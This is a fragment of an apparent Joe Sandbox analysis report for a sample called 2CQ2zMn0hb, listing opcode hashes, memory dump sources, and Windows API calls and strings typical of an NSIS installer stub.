                                                                                                              • Instruction ID: 7df26e82c1b55deacb89e25b5b4f7fa4e164e4f01fa59b09dc22541ad59d7f59
                                                                                                              • Opcode Fuzzy Hash: cc506b74e42097ca332a9e96e62f0ba5b48ebbe5167956a209712ab94be864e8
                                                                                                              • Instruction Fuzzy Hash: 55C1A174E01218CFDB54DFA9D994B9DBBB2BF89300F1081A9D409AB365DB74AA85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 78ff4844ad0db4312c00855b7ecd40fb3b13025d9452cc9012d94f2504271cd1
                                                                                                              • Instruction ID: d195f9a6410e63ef80a79836f21d098ebccf2772f23831a4bbbcf46f86dce81b
                                                                                                              • Opcode Fuzzy Hash: 78ff4844ad0db4312c00855b7ecd40fb3b13025d9452cc9012d94f2504271cd1
                                                                                                              • Instruction Fuzzy Hash: E1C1D274E00218CFDB55DFA4D994BADBBB2BF49300F1085A9D409AB365DB74AE86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f270af88f4b7ab147429b10698c5f96f868ad31a9f74b36b0597b5c2683e40c7
                                                                                                              • Instruction ID: b9e458d957ffbcee05fc9a1c47c2cdc2023bccb6aa3f67307f2d627bbea60233
                                                                                                              • Opcode Fuzzy Hash: f270af88f4b7ab147429b10698c5f96f868ad31a9f74b36b0597b5c2683e40c7
                                                                                                              • Instruction Fuzzy Hash: 15B1B174E00218CFDB54DFA4D994BADBBB2BF49300F1085A9D809AB365DB74AE85CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c3b07adbe947cfce13dbc7888449b7f5dac546880d7f3f3ff5c7b1a20e5c3606
                                                                                                              • Instruction ID: 41915051a94cf5cd34dbf9c1813f4a63f615a4e9fb6c472648bf0da948da17ae
                                                                                                              • Opcode Fuzzy Hash: c3b07adbe947cfce13dbc7888449b7f5dac546880d7f3f3ff5c7b1a20e5c3606
                                                                                                              • Instruction Fuzzy Hash: FBD01734D40228CADB11DFA898402ECB770EB99310F0021A2C16CA3210C7B04A90CE41
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                              • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                              • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                              • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                              • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                              • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                              • EmptyClipboard.USER32 ref: 004058B7
                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                              • CloseClipboard.USER32 ref: 00405912
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                              • String ID: (7B${
                                                                                                              • API String ID: 590372296-525222780
                                                                                                              • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                              • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                              • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                              • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                              • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                              • DestroyWindow.USER32 ref: 00403EF3
                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                              • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                              • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                              • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                              • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                              • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                              • String ID: (7B
                                                                                                              • API String ID: 184305955-3251261122
                                                                                                              • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                              • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                              • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                              • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                              APIs
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,75923420,00435000,00000000), ref: 00403B59
                                                                                                              • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                                              • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                              • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                              • API String ID: 1975747703-1425696872
                                                                                                              • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                              • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                              • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                              • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                              • GetSysColor.USER32(?), ref: 004045FE
                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                              • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                              • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                              • SetCursor.USER32(00000000), ref: 00404720
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                              • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                              • String ID: N
                                                                                                              • API String ID: 3103080414-1130791706
                                                                                                              • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                              • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                              APIs
                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                              • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                              • String ID: F
                                                                                                              • API String ID: 941294808-1304234792
                                                                                                              • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                              • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                              • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                              • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$A
                                                                                                              • API String ID: 2624150263-3645020878
                                                                                                              • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                              • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                              • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                              • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                              APIs
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                              • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                              • wsprintfA.USER32 ref: 004060B3
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                              • API String ID: 2171350718-461813615
                                                                                                              • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                              • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                              • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                              • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                                                                              Strings
                                                                                                              • Error launching installer, xrefs: 00402F80
                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                              • Null, xrefs: 00403029
                                                                                                              • soft, xrefs: 00403020
                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                              • Inst, xrefs: 00403017
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                              • API String ID: 2803837635-787788815
                                                                                                              • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                              • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                              • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                              • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                                              • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004065B3
